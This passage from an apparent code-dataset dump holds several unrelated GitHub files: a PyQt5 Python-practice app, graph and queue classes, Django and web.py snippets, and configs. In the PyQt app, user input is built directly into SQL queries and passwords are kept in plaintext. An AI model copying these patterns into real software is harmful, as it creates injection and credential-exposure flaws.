Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog, QMessageBox, QInputDialog\nfrom PyQt5.QtWidgets import QLabel, QHBoxLayout, QLineEdit, QListWidget, QListWidgetItem\n\nimport sqlite3\n\nfrom run_and_test_code import run, testing\nfrom UI_Form import Ui_MainWindow, Ui_FormTask, Ui_Dialog\n\n\nclass About(QDialog):\n    def __init__(self):\n        super(About, self).__init__()\n        self.setLayout(QHBoxLayout(self))\n        with open('README.md', 'r', encoding='UTF-8') as inf:\n            self.lable = QLabel(inf.read(), self)\n        self.layout().addWidget(self.lable)\n\n\nclass InfoMessage(QMessageBox):\n    def __init__(self, title: str, message: str):\n        super(InfoMessage, self).__init__()\n        self.setIcon(QMessageBox.Information)\n        self.setWindowTitle(title)\n        self.setText(message)\n        self.setStandardButtons(QMessageBox.Ok)\n\n\nclass Auth(QDialog, Ui_Dialog):\n    def __init__(self, flag: bool, title: str):\n        super(Auth, self).__init__()\n        self.setupUi(self)\n        self.setWindowTitle(title)\n        self.flag = flag\n        if flag:\n            self.label_name.hide()\n            self.input_name.hide()\n        else:\n            self.label_name.show()\n            self.input_name.show()\n        self.buttonBox.accepted.connect(self.auth_user_ok)\n        self.buttonBox.rejected.connect(self.auth_user_not)\n\n    def auth_user_ok(self):\n        if self.flag:\n            login = self.login.text()\n            password = self.password.text()\n            user = self.__get_user(login)\n            if user:\n                if str(user[0][1]) == password:\n                    MainWindow.user = (user[0][0], user[0][2], user[0][3])\n                    if self.check_save_user.isChecked():\n                        self.__save_authentication(MainWindow.user)\n                    else:\n                        self.__save_authentication((None, None, None))\n                else:\n                    msgBox = QMessageBox()\n                    
msgBox.setText(\"Неверный пароль!!!\")\n msgBox.exec()\n elif login:\n msg = InfoMessage(\n \"Ошибка имени пользователя\",\n \"Пользователя с таким именем не существует!\\nПоворите ввод данных или зарегистрируйтесь.\"\n )\n retval = msg.exec_()\n else:\n msg = InfoMessage(\n \"Ошибка имени пользователя\",\n \"Поле 'логин' не может быть пустым!\\n Введите ваши данные еще раз\"\n )\n retval = msg.exec_()\n else:\n login = self.login.text()\n password = self.password.text()\n name = self.input_name.text()\n if login and password and name:\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n cur.execute(f\"INSERT INTO user(login, password, name) VALUES ('{login}', '{password}', '{name}')\")\n conn.commit()\n conn.close()\n user = self.__get_user(login)\n MainWindow.user = (login, name, user[0][3])\n if self.check_save_user.isChecked():\n self.__save_authentication(MainWindow.user)\n else:\n self.__save_authentication((None, None, None))\n else:\n msg = InfoMessage(\n \"Ошибка регистрации\",\n \"Все три поля должны быть обязательно заполненны!\"\n )\n retval = msg.exec_()\n\n self.login.clear()\n self.password.clear()\n self.input_name.clear()\n\n def auth_user_not(self):\n self.login.clear()\n self.password.clear()\n\n def __get_user(self, login):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = cur.execute(f\"SELECT login, password, name, id FROM user WHERE login = '{login}'\").fetchall()\n conn.close()\n return result\n\n def __save_authentication(self, user):\n with open('log.txt', 'w', encoding='UTF-8') as log:\n log.write(' '.join(map(str, user)))\n\n\nclass Task(QWidget, Ui_FormTask):\n \"\"\"\n Виджет окна решения задачи.\n :arg\n mainWin объект главного окна, в нем список выбранных задач и пользователь\n .user(login, name, id)\n .tasks[id_1, id_2, ...]\n task[id, title, text, tests, decision, flag_done] текущая задача\n \"\"\"\n\n def __init__(self, pk, mainWin):\n super(Task, self).__init__()\n self.setupUi(self)\n self.setWindowIcon(QIcon('python.jpg'))\n self.label_verdict.hide()\n self.label_verdict.setStyleSheet(\"background-color: #94db70;\")\n self.mainWin = mainWin\n self.task = self.__get_task(pk)\n\n self.__view_task()\n self.button_run_code.clicked.connect(self.run_code)\n self.button_run_test.clicked.connect(self.run_test)\n self.previous_task.clicked.connect(self.show_previous_task)\n self.next_task.clicked.connect(self.show_next_task)\n self.back_button.clicked.connect(self.back)\n\n def run_code(self):\n code = self.input_decision.toPlainText()\n outs, errs = run(code, self.input_data.toPlainText())\n self.output_answer.setText(f'{outs.decode()}{errs.decode()}')\n\n def run_test(self):\n code = self.input_decision.toPlainText()\n result, flag_done = testing(code, self.task[3])\n self.output_answer.setText(result)\n if not MainWindow.user[0] is None:\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n if self.task[4]:\n print('Перезаписываем решение')\n request = f\"\"\"UPDATE user_decision SET complited = '{flag_done}', task_decision = '{code.replace(\"'\",'#!#' )}' \n WHERE task_id = '{self.task[0]}' AND user_id = '{MainWindow.user[2]}'\"\"\"\n else:\n print('Сохраняем решение')\n request = f\"\"\"INSERT INTO user_decision(task_id, complited, task_decision, user_id)\n VALUES ('{self.task[0]}', '{flag_done}', '{code.replace(\"'\",'#!#' )}', '{MainWindow.user[2]}')\"\"\"\n self.task[4], self.task[5] = code, flag_done\n cur.execute(request)\n conn.commit()\n conn.close()\n if self.task[5]:\n self.label_verdict.show()\n else:\n 
self.label_verdict.hide()\n\n else:\n msg = InfoMessage(\n \"Сохранение не удалось\",\n \"Сохранять решения могут только авторизированные пользователи!!!\\n\"\n \"Если хотите сохранить решения вернитесь к списку задач и авторизируйтесь.\"\n )\n retval = msg.exec_()\n\n def show_previous_task(self):\n self.__clear_input()\n index_task = (self.mainWin.tasks.index(self.task[0]) - 1) % len(self.mainWin.tasks)\n self.task = self.__get_task(self.mainWin.tasks[index_task])\n self.__view_task()\n\n def show_next_task(self):\n self.__clear_input()\n index_task = (self.mainWin.tasks.index(self.task[0]) + 1) % len(self.mainWin.tasks)\n self.task = self.__get_task(self.mainWin.tasks[index_task])\n self.__view_task()\n\n def back(self):\n self.close()\n\n def closeEvent(self, event):\n msg = InfoMessage(\n \"Завершение работы\",\n \"Вы действительно хотите уйти?\\n Не отправленное решение не будет сохранено!\"\n )\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n if msg.exec() == 1024:\n self.mainWin.show()\n event.accept()\n else:\n event.ignore()\n\n def __get_task(self, pk):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n task = cur.execute(f\"SELECT id, title, task_text, tests\"\n f\" FROM task \"\n f\"WHERE id = {pk}\").fetchall()\n decision = []\n if not MainWindow.user[0] is None:\n decision = cur.execute(f\"SELECT task_decision, complited\"\n f\" FROM user_decision \"\n f\"WHERE user_id = {MainWindow.user[2]} AND task_id = {pk}\").fetchall()\n conn.close()\n if not decision:\n decision = [['', 0]]\n task = list(task[0])\n task.extend(decision[0])\n task[4] = task[4].replace('#!#', \"'\")\n return task\n\n def __view_task(self):\n self.setWindowTitle(self.task[1])\n self.label_task.setText(self.task[2])\n self.input_decision.setText(self.task[4])\n if self.task[5]:\n self.label_verdict.show()\n else:\n self.label_verdict.hide()\n\n def __clear_input(self):\n self.input_decision.clear()\n self.input_data.clear()\n self.output_answer.clear()\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n '''\n Виджет главного окна.\n :arg\n user(login, name, id) авторизированный пользователь, по умолчанию (None, None, None)\n '''\n\n user = (None, None, None)\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.setWindowTitle('Тренажер по python')\n self.setWindowIcon(QIcon('python.jpg'))\n self.about_dialog = About()\n self.__get_last_autauthentication()\n self.tasks = list()\n\n self.radioButton_1.setChecked(True)\n\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = [str(el[0]) + ' ' + (el[1]\n if len(el[1]) < 30 else el[1][:27] + '...')\n for el in cur.execute(f\"SELECT id, section FROM section_task ORDER BY id\").fetchall()]\n conn.close()\n self.comboBox_section.addItems(['Все темы'] + result)\n\n self.show_list_task.clicked.connect(self.choise_task)\n self.about.triggered.connect(self.show_about)\n self.auth_button.clicked.connect(self.show_auth)\n self.reg_button.clicked.connect(self.show_reg)\n self.list_task.clicked.connect(self.show_task)\n\n def choise_task(self):\n sql_request = self.__get_sql_request()\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = cur.execute(sql_request).fetchall()\n self.tasks = [el[0] for el in result]\n result = [' '.join(str(i) for i in el) for el in result]\n conn.close()\n self.list_task.clear()\n self.list_task.addItems(result)\n\n def show_task(self, item):\n self.second_form = Task(item.data().split()[0], self)\n self.second_form.show()\n self.hide()\n\n def 
show_about(self):\n self.about_dialog.show()\n\n def show_auth(self):\n auth_dialog = Auth(True, 'Авторизация пользователя')\n auth_dialog.show()\n self.hide()\n\n if auth_dialog.exec_() == QDialog.Accepted:\n self.__welcome_text()\n self.show()\n\n def show_reg(self):\n auth_dialog = Auth(False, 'Регистрация пользователя')\n auth_dialog.show()\n self.hide()\n\n if auth_dialog.exec_() == QDialog.Accepted:\n self.__welcome_text()\n self.show()\n\n def __welcome_text(self):\n if not MainWindow.user[0] is None:\n self.welcome_user.setText(f'Здравствуйте, {MainWindow.user[1]}')\n self.radioButton_1.show()\n self.radioButton_2.show()\n self.radioButton_3.show()\n else:\n self.welcome_user.setText(f'Здравствуйте, пожалуйста авторизируйтесь')\n self.radioButton_1.hide()\n self.radioButton_2.hide()\n self.radioButton_3.hide()\n\n def __get_sql_request(self):\n choise_filters = list()\n if self.comboBox_section.currentText() != 'Все темы':\n choise_filters.append(f'section_id = {self.comboBox_section.currentText().split()[0]}')\n if not (MainWindow.user[2] is None or self.radioButton_1.isChecked()):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n temp = ', '.join(str(i[0])\n for i in cur.execute(\n f\"\"\"\n SELECT task_id \n FROM user_decision \n WHERE user_id = {MainWindow.user[2]} AND complited = 1\n \"\"\").fetchall())\n if self.radioButton_2.isChecked():\n choise_filters.append(f\"\"\"id not in ({temp})\"\"\")\n else:\n choise_filters.append(f\"\"\"id in ({temp})\"\"\")\n conn.close()\n\n sql_request = f\"\"\"SELECT id, title \n FROM task \n {('WHERE ' + ' AND '.join(choise_filters)) if choise_filters else ''}\n ORDER BY id\"\"\"\n return sql_request\n\n def __get_last_autauthentication(self):\n with open('log.txt', 'r', encoding='UTF-8') as log:\n user = log.read().strip().split()\n if user[0] != 'None':\n MainWindow.user = tuple(user)\n self.__welcome_text()\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec())","repo_name":"kocheshkovdmitriy/PyQT_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74214239207","text":"from asyncio.windows_events import NULL\nfrom matriz import Matriz \nfrom vertice import Vertice\nfrom utils import *\n\nclass Grafo:\n def __init__(self, max_vertices, ponderado, direcionado):\n self._vertices = []\n \n self._estrutura = Matriz(\"Matriz de Adjacência\", max_vertices, max_vertices)\n if(ponderado):\n self._estrutura_pesos = Matriz(\"Matriz de Pesos\", max_vertices, max_vertices)\n\n self._max_vertices = max_vertices\n self._qnt_atual_vertices = 0\n self._ponderado = ponderado\n self._direcionado = direcionado\n\n def add_vertice(self, rotulo):\n if self.existe_vertice(rotulo) == False:\n if(self._qnt_atual_vertices < self._max_vertices):\n v = Vertice(rotulo)\n self._vertices.append(v)\n self._qnt_atual_vertices += 1\n else:\n print(\"Quantidade máxima de vértices já inserida\")\n espera_clique()\n else:\n print(\"Vertice já inserido no grafo!\")\n espera_clique()\n \n def log(self):\n tipo_grafo_ponderacao = \"ponderado\" if self._ponderado else \"não ponderado\"\n tipo_grafo_direcao = \"direcionado\" if self._direcionado else \"nao direcionado\"\n \n print(f\"Tipo de grafo: {tipo_grafo_direcao} e {tipo_grafo_ponderacao}\")\n print(f\"Quantidade máxima de vértices: {self._max_vertices}\")\n print(f\"Quantidade atual de vertices: 
{len(self._vertices)}\")\n\n self.mostra_lista_vertices()\n self._estrutura.display()\n if(self._ponderado):\n self._estrutura_pesos.display()\n \n def conecta(self, rotulo_v1, rotulo_v2):\n indice_v1 = self.get_indice(rotulo_v1)\n indice_v2 = self.get_indice(rotulo_v2)\n peso = 0\n if indice_v1 > -1 and indice_v2 > -1:# validacao da conexao\n if(self._ponderado):\n print(\"Insira o peso da aresta\", end=\": \")\n peso = int(input())\n self._estrutura_pesos.add_aresta(indice_v1, indice_v2, self._ponderado, peso)\n \n self._estrutura.add_aresta(indice_v1, indice_v2, self._direcionado)\n if(self._direcionado):\n self._vertices[indice_v1].update_grau_saida()\n self._vertices[indice_v2].update_grau_incidencia()\n else:\n self._vertices[indice_v1].update_grau()\n self._vertices[indice_v2].update_grau()\n else:\n print(\"ATENÇÂO -> algum dos rótulos inseridos não está presente no seu grafo\")\n \n def _get_adjacencias(self, rotulo):\n indice = self.get_indice(rotulo)\n if(indice!= -1):\n adjacencias_raw = self._estrutura.get_adjacencias(indice)\n adjacencias = []\n for i in range(len(adjacencias_raw)): \n if adjacencias_raw[i] == 1:\n adjacencias.append(self._vertices[i])\n return adjacencias\n return []\n \n \n def mostra_adjacencias(self, rotulo):\n indice = self.get_indice(rotulo)\n if(indice != -1):\n adjacencias = self._get_adjacencias(rotulo)\n \n print(f\"Vértices adjacentes ao vértice {rotulo}:\")\n print(\"[\", end=\"\")\n for i in range(len(adjacencias)):\n print(adjacencias[i].rotulo, end = \"\")\n print(\"\"if i == self._qnt_atual_vertices - 1 else \",\", end = \"\")\n print(\"]\")\n espera_clique() \n else: \n print(\"Vértice não existente!\");\n espera_clique()\n\n \n def get_indice(self, rotulo):\n result = 0\n for i in range(len(self._vertices)):\n if self._vertices[i].rotulo == rotulo:\n return result\n result += 1 \n return -1 # nao encontrou o vertice\n \n def existe_vertice(self,rotulo):\n return self.get_indice(rotulo) != -1\n\n def mostra_lista_vertices(self):\n print(\"Vertices presentes no seu grafo:\\n[\")\n \n for i in range(self._qnt_atual_vertices):\n print(self._vertices[i].to_string())\n print(\"]\") ","repo_name":"gumartinslopes/College","sub_path":"4thSemester/Grafos/implementacaoPython/grafo.py","file_name":"grafo.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73516070568","text":"from pattern import parse_str, parse_stmt_str, parse_expr_str\nfrom instance import try_create_instance\nfrom constant_assignment import VariableMap\nfrom type_assignment import TypeAssignment\nfrom codelet_generator import generate_codelet_var_ints\nfrom populator import PopulateParameters, populate_stmt, populate_expr\nfrom random import randint, seed\nfrom pathlib import Path\n\nn_exprs = 9\nn_iterations = 10\n\ntypes = TypeAssignment(default_types=['int'])\ntypes.set('A', 'double')\ntypes.set('B1', 'double')\ntypes.set('B2', 'double')\ntypes.set('B3', 'double')\ntypes.set('B4', 'double')\ntypes.set('B5', 'double')\ntypes.set('B6', 'double')\ntypes.set('B7', 'double')\ntypes.set('B8', 'double')\ntypes.set('B9', 'double')\n\ninit_value_map = {\n 'I': '32000',\n 'A': 'drand(0.0, 1.0)',\n 'B1': 'drand(0.0, 1.0)',\n 'B2': 'drand(0.0, 1.0)',\n 'B3': 'drand(0.0, 1.0)',\n 'B3': 'drand(0.0, 1.0)',\n 'B4': 'drand(0.0, 1.0)',\n 'B5': 'drand(0.0, 1.0)',\n 'B6': 'drand(0.0, 1.0)',\n 'B7': 'drand(0.0, 1.0)',\n 'B8': 'drand(0.0, 1.0)',\n 'B9': 'drand(0.0, 1.0)',\n}\n\ndst_dir = 
'output'\nPath(dst_dir).mkdir(parents=True, exist_ok=True)\n\nloop_code = \"\"\"\ndeclare I;\ndeclare A[];\ndeclare B1[];\ndeclare B2[];\ndeclare B3[];\ndeclare B4[];\ndeclare B5[];\ndeclare B6[];\ndeclare B7[];\ndeclare B8[];\ndeclare B9[];\n\nfor [(i, >=0, <=I-1)] {\n A[i] = (#_# * #_# + #_#) + (#_# * #_# + #_#) + (#_# * #_# + #_#);\n}\n\"\"\"\n\nskeleton = parse_str(loop_code)\n\ndef populate_exprs(skeleton, n_vars):\n indices = [i for i in range(1, n_vars+1)]\n for i in range(n_exprs - n_vars):\n indices.append(randint(1, n_vars))\n exprs = [parse_expr_str(f'B{i}[i]') for i in indices]\n for e in exprs:\n p = PopulateParameters(exprs, is_finite=True)\n return populate_expr(skeleton, p.populate)\n\ndef gen(skeleton, n_vars):\n program = populate_exprs(skeleton.clone(), n_vars)\n var_map = VariableMap(0, 32000)\n var_map.set_value('I', 32000)\n instance = try_create_instance(program, var_map, types)\n print(instance.pprint())\n batch = 'vec_1_stmt'\n name = f'vec_{n_vars}_loads'\n code = f'{name}.c'\n codelet = f'{code}_de'\n generate_codelet_var_ints('LoopGen', batch, code, codelet,\n n_iterations, [32000], instance, init_value_map)\n\nseed(0)\nfor n_vars in range(1, n_exprs+1):\n gen(skeleton.clone(), n_vars)\n\n","repo_name":"amchiclet/compiler-evaluation-experiments","sub_path":"code-generation-scripts/vec-programs.py","file_name":"vec-programs.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16410343627","text":"import multiprocessing\n\n# 绑定端口号\nbind = '127.0.0.1:8000' # 负载均衡需要改为本机ip\n\n# 工作进程数\nworkers = multiprocessing.cpu_count() * 2 + 1\n\n# 每个进程数线程数\n# threads = multiprocessing.cpu_count() * 2 + 1\n\ntimeout = 30\ndaemon = False\n\n# 日志级别\nloglevel = 'debug' # 错误日志级别\n# access_log_format = '%(t)s %(p)s %(h)s %({X-Forwarded-For}i)s \"%(r)s\" %(s)s %(L)s %(b)s %(f)s\" \"%(a)s\"'\naccesslog = '/local/logs/gunicorn.acc.log'\nerrorlog = '/local/logs/gunicorn.err.log' # '-' 输出到屏幕方式\ncapture_output = True # 把标准输出和标准错误重定向到日志文件中\n\npidfile = '/tmp/gunicorn.pid'\n","repo_name":"JustThresh/OnlinePercy","sub_path":"percy/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73246588648","text":"import math\nimport time\nfrom urllib.parse import urlparse\n\nimport redis\n\n\nclass Client(object):\n def __init__(self, conn_string):\n \"\"\"\n A Redis-based ``Client``.\n\n Args:\n conn_string (str): The DSN. The host/port/db are parsed out of it.\n Should be of the format ``redis://host:port/db``\n \"\"\"\n self.conn_string = conn_string\n bits = urlparse(self.conn_string)\n self.conn = self.get_connection(\n host=bits.hostname,\n port=bits.port,\n db=bits.path.lstrip(\"/\").split(\"/\")[0],\n )\n\n def get_connection(self, host, port, db):\n \"\"\"\n Returns a ``StrictRedis`` connection instance.\n \"\"\"\n return redis.StrictRedis(\n host=host, port=port, db=db, decode_responses=True\n )\n\n def len(self, queue_name):\n \"\"\"\n Returns the length of the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n `Gator`` instance.\n\n Returns:\n int: The length of the queue\n \"\"\"\n return self.conn.zcard(queue_name)\n\n def drop_all(self, queue_name):\n \"\"\"\n Drops all the task in the queue.\n\n Args:\n queue_name (str): The name of the queue. 
Usually handled by the\n ``Gator`` instance.\n \"\"\"\n task_ids = self.conn.zrange(queue_name, 0, -1)\n\n for task_id in task_ids:\n self.conn.delete(task_id)\n\n self.conn.delete(queue_name)\n\n def push(self, queue_name, task_id, data, delay_until=None):\n \"\"\"\n Pushes a task onto the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n task_id (str): The identifier of the task.\n data (str): The relevant data for the task.\n delay_until (float): Optional. The Unix timestamp to delay\n processing of the task until. Default is `None`.\n\n Returns:\n str: The task ID.\n \"\"\"\n if delay_until is None:\n delay_until = math.ceil(time.time())\n\n self.conn.zadd(queue_name, {task_id: delay_until}, nx=True)\n self.conn.set(task_id, data)\n return task_id\n\n def pop(self, queue_name):\n \"\"\"\n Pops a task off the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n\n Returns:\n str: The data for the task.\n \"\"\"\n now = math.floor(time.time())\n available_to_pop = self.conn.zrangebyscore(\n queue_name, 0, now, start=0, num=1\n )\n\n if not len(available_to_pop):\n return None\n\n popped = self.conn.zpopmin(queue_name)\n task_id, delay_until = popped[0][0], popped[0][1]\n data = self.conn.get(task_id)\n self.conn.delete(task_id)\n return data\n\n def get(self, queue_name, task_id):\n \"\"\"\n Pops a specific task off the queue by identifier.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n task_id (str): The identifier of the task.\n\n Returns:\n str: The data for the task.\n \"\"\"\n self.conn.zrem(queue_name, task_id)\n data = self.conn.get(task_id)\n\n if data:\n self.conn.delete(task_id)\n return data\n","repo_name":"toastdriven/alligator","sub_path":"alligator/backends/redis_backend.py","file_name":"redis_backend.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"72421668647","text":"def isValid(strs):\n\n brackets = {\n '(': 1, ')': -1,\n '[': 2, ']': -2,\n '{': 3, '}': -3\n }\n\n temp = []\n\n if strs == '':\n return True\n\n for i in strs:\n value = brackets.get(i)\n\n if value is None:\n return False\n\n if value > 0:\n temp.append(value)\n else:\n\n if not temp:\n return False\n\n if value + temp[-1] != 0:\n return False\n\n temp.pop()\n return False if temp else True\n'''\nbrackets_pair = {')': '(', ']': '[', '}': '{'}\nleft_bkt = ['(', '{', '[']\n\n\ndef isValid(s):\n\n stack = []\n\n for i in s:\n if i in left_bkt:\n stack.append(i)\n elif i in right_bkt:\n if not stack or stack[-1] != brackets_pair[i]:\n return False\n stack.pop()\n else:\n return False\n return False if not stack else True\n\n'''\na = isValid('()')\nprint(a)\n","repo_name":"danielliu000/MyPythonLearning","sub_path":"20_Valid_Parentheses.py","file_name":"20_Valid_Parentheses.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27382848253","text":"import random\n\nnumber_pool = range(1,6)\nsecret_number = random.choice(number_pool)\nguess_count = 0\nguess_limit = 3\n\nwhile guess_count < guess_limit:\n guess = int(input('Guess the number between 1 and 5: '))\n guess_count += 1\n if guess == secret_number:\n print('You got it!')\n break\nelse:\n print(f'Sorry, the number was {secret_number}. 
Try again :(')\n","repo_name":"tronplex/Python-numberguess","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38848284677","text":"import discord\r\nfrom ColdOneCore import CoreColors\r\nfrom VoteBase import VoteBase\r\n\r\nclass Vote(VoteBase):\r\n\r\n activeVotes = {}\r\n\r\n # Checks if a user already has a vote going\r\n @staticmethod\r\n def doesUserVoteExist(author):\r\n return author in Vote.activeVotes\r\n\r\n # Removes and returns a user's bet\r\n @staticmethod\r\n def popVote(author):\r\n vote = Vote.activeVotes[author]\r\n del Vote.activeVotes[author]\r\n return vote\r\n\r\n # Creates a vote and sends its embed\r\n @staticmethod\r\n async def createVote(ctx, author, message):\r\n if (not author) or (not message):\r\n return\r\n vote = Vote(author=author, description=message)\r\n await vote.sendEmbed(ctx)\r\n\r\n @staticmethod\r\n async def closeVote(ctx, vote):\r\n if not vote:\r\n return\r\n await vote._closeVote(ctx)\r\n\r\n def __init__(self, author, description):\r\n self.author = author\r\n self.voteDesc = description\r\n super().__init__(title=description, author=author, color=CoreColors.InteractColor)\r\n Vote.activeVotes.update({self.author:self})\r\n\r\n async def _closeVote(self, ctx):\r\n tally = await self.countVote()\r\n await self.clearEmbed()\r\n await self.getCloseEmbed(ctx, tally)\r\n\r\n async def getCloseEmbed(self, ctx, tally):\r\n ayesHaveIt = len(tally.get('voteFor')) - len(tally.get('voteAgainst'))\r\n super().setTitle(\"Vote over: \" + self.voteDesc)\r\n if ayesHaveIt > 0:\r\n super().setDescription(\"Ayes have it!\")\r\n elif ayesHaveIt < 0:\r\n super().setDescription(\"Nays have it!\")\r\n else:\r\n super().setDescription(\"The vote's a tie!\")\r\n await self.sendEmbed(ctx, True)\r\n","repo_name":"t4h3d1f/ColdOneBot","sub_path":"Vote.py","file_name":"Vote.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43446917624","text":"# encoding:utf-8\nimport web\nimport datetime\nimport db\nimport json\n\nurls = (\n '/','Index',\n '/day/(.+)', 'Day',\n '/status', 'Status',\n)\napp = web.application(urls, globals())\n\nDB = db.DB()\n\nclass Index:\n def GET(self):\n today = datetime.datetime.today()\n day = today.strftime(\"%Y-%m-%d\")\n raise web.seeother('/day/%s' % day)\n\nclass Day:\n def GET(self, day):\n web.header('Content-Type', 'application/json')\n data = DB.getDay(day)\n result = []\n for one in data:\n result.append({\"id\":one[0], \"temperature\":one[1], \"humidity\":one[2], \"time\":one[3]})\n return json.dumps(result)\n\nclass Status:\n def GET(self):\n return '
\n    Server running...\n
    '\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"bluebanboom/thserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42758186116","text":"from django.conf.urls import include\nfrom django.urls import path\nfrom post.views import *\n\nurlpatterns = [\n\t\tpath('', anasayfa),\n\t\tpath('anasayfa', anasayfa),\n\t\tpath('tum_sorular', tum_sorular, name='tum_sorular'),\n\t\tpath('cevapsizlar', cevapsizlar),\n\t\tpath('en_yeniler', en_yeniler),\n\t\tpath('/', post_detail, name='detail'),\n\t\tpath('/comment', add_comment_to_post, name='add_comment_to_post'),\n\t\tpath('comment//approve', comment_approve, name='comment_approve'),\n\t\tpath('comment//remove', comment_remove, name='comment_remove'),\n\t\tpath('soru_sor', soru_sor),\n\t\tpath('kayit', kayit),\n\t\tpath('iletisim', iletisim),\n\t\tpath('', include('django.contrib.auth.urls')),\n]\n\n\n","repo_name":"busradogann/soru_cevap_platformu","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11032581715","text":"from math import *\nimport numpy as np\nimport phys_const_cgs as const\nimport units_cgs as units\nfrom routines import *\nfrom LambdaOp import *\nfrom Geometry import *\n\nclass Detector:\n def __init__(self, size_pix, distance_kpc, FOV_mas):\n self.size_pix = size_pix\n self.distance_kpc = distance_kpc\n self.FOV_mas = FOV_mas\n\n def get_image(self, grid, wavelength_um, orient):\n\n def coincide(p1, p2):\n return dist3d(p1, p2)<1.0e3\n\n def order_points(inter_outer_):\n if inter_outer_[0][2] < inter_outer_[1][2]:\n inter_outer = inter_outer_\n else:\n inter_outer = (inter_outer_[1], inter_outer_[0])\n return inter_outer\n\n\n R_inner = grid.r_grid[0]\n R_outer = grid.r_grid[-1]\n halfLen = 0.5*(grid.z_grid[-1]-grid.z_grid[0])\n\n H = self.size_pix\n center = H/2.0\n pixel_scale = self.FOV_mas / H\n print('Pixel_scale:', pixel_scale)\n pixel_AU = pixel_scale * self.distance_kpc * const.AU\n\n op = LambdaOp(wavelength_um, grid)\n direct = orient.rotate( np.array([0,0,-1]) )\n dtau = 0.1\n ntau = 20\n tau_grid = []\n tau = 0\n for i in range(ntau):\n tau_grid.append(tau)\n tau += dtau\n\n IMG = np.zeros((H,H))\n for i in range(H):\n for j in range(H):\n IMG[i,j] = 0.0\n sky_X = (i - center)*pixel_AU\n sky_Y = (j - center)*pixel_AU\n X_local = orient.rotate(np.array([sky_X, sky_Y, 0]) )\n ray = Ray(X_local, direct)\n inter_outer_ = Geometry.intersect_cylinder(ray, R_outer, halfLen)\n inter_inner_ = Geometry.intersect_cylinder(ray, R_inner, halfLen)\n if inter_outer_==None: continue\n\n inter_outer = order_points(inter_outer_)\n\n\n if inter_inner_ == None:\n entry = inter_outer[1]\n else:\n inter_inner = order_points(inter_inner_)\n if coincide(inter_outer[0], inter_inner[0]) and coincide(inter_outer[1], inter_inner[1]):\n continue\n else:\n if inter_inner[0][2]>inter_outer[0][2]:\n entry = inter_inner[0]\n if inter_inner[1][2] v_scale:\n width = r_width\n height = int(width * v_scale)\n x = 0\n y = (r_height - height) / 3\n else:\n height = r_height\n width = int(height * v_scale)\n x = (r_width - width) / 2\n y = 0\n box = (x, y, x + width, y + height)\n new_img = img.crop(box)\n if save_path:\n new_img.save(save_path)\n return save_path\n else:\n new_img.save(open_path)\n print(\"已剪切\")\n return 
open_path\n\n\n\n\n\n","repo_name":"wangle6318/jianshu","sub_path":"bbs/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17652927220","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef create_process_type(apps, schema_editor):\n ProcessType = apps.get_model('core', 'ProcessType')\n ProcessType.objects.get_or_create(\n type='afm',\n is_destructive=False,\n name='AFM',\n full_name='Atomic Force Microscopy',\n description='A very high-resolution scanning probe microscopy technique '\n 'to characterize surface morphology.',\n scheduling_type='none')\n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('afm', '0001_initial'),\n ('core', '0002_create_processtypes'),\n ]\n\n operations = [\n migrations.RunPython(create_process_type),\n 